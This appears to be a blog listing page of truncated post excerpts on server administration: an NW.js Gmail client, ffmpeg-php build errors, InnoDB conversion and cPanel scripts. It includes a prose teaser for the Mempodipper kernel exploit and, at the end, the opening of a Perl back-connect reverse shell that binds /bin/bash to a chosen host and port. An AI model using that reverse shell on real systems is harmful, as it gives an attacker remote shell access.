Inbox by Gmail for Desktop
A simple & beautiful desktop client for inbox gmail which runs on Linux, OS X and Windows. Built with NW.js. Please note that, This is NOT an official product, so use it with your own risk 🙂 Major work of
A simple & beautiful desktop client for inbox gmail which runs on Linux, OS X and Windows. Built with NW.js. Please note that, This is NOT an official product, so use it with your own risk 🙂 Major work of
Today I’ve started to play with perl Rex which is one of the great tool for automating server management tasks. I have never used Chef or Puppet or Ansible, so I did not know what to expect and what are
While installing ffmpeg-php-0.6.0 on centos server, if you may came across the below error , like :: In file included from /usr/include/sys/stat.h:107, from /usr/include/php/main/php_streams.h:28, from /usr/include/php/main/php.h:395, from /root/ffmpeg-php-0.6.0/ffmpeg-php.c:40: /usr/include/bits/stat.h:91: error: field ‘st_atim’ has incomplete type /usr/include/bits/stat.h:92: error: field ‘st_mtim’ has
The InnoDB engine is superior. There is no reason to run MyISAM anymore. Here is a Bash script that will convert all tables, that can be converted, to InnoDB. If you do not have access to a script shell, you
Here’s a script that I wrote to get the latest cricket score without visiting the site. It’s a shell  script that makes use of rediff scores. #!/bin/bash lynx=`which lynx` if [ -z $lynx ]; then lynx=`which curl` option=”-s” else lynx=$lynx option=”-dump”
You can use this script to install suphp in cpanel server. #!/bin/bash DIR=/usr/local/src INSPATH=”/opt/suphp” #$1=$CUS CMDOPT=”–prefix=/opt/suphp –with-apr=/usr/local/apache/bin/ –with-apxs=/usr/local/apache/bin/apxs –with-logfile=/usr/local/apache/logs/suphp_log $CUS” #checkig previous easyapache profile if [ -e “/opt/suphp” ] || [ -e “/usr/local/apache/modules/mod_suphp.so” ]; then echo “Suphp already installed. Exiting…..!!!” exit
 To reset the emailaccount password on a cPanel server without login whm or cpanel, You can use the given script to reset the password. #!/usr/bin/perl -wl # cpanel – chemailpass Copyright(c) 2011 prajith.in. # All rights Reserved. # http://prajith.in BEGIN
Introducing Mempodipper, an exploit for CVE-2012-0056. /proc/pid/mem is an interface for reading and writing, directly, process memory by seeking around with the same addresses as the process’s virtual memory space. In 2.6.39, the protections against unauthorized access to /proc/pid/mem were
This page presents a little /bin/sh shell script that will help you processing form data in a CGI shell script, without needing C or perl. You receive the form values straight into your shell environment, where you can then access
#!/usr/bin/perl use IO::Socket; $system = ‘/bin/bash’; $ARGC=@ARGV; print “# <==BackConnect Shell==> \n\n”; if ($ARGC!=2) { print “Usage: $0 [Host] [Port] \n\n”; die “Ex: $0 127.0.0.1 1313 \n”; } use Socket; use FileHandle; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(‘tcp’)) or die print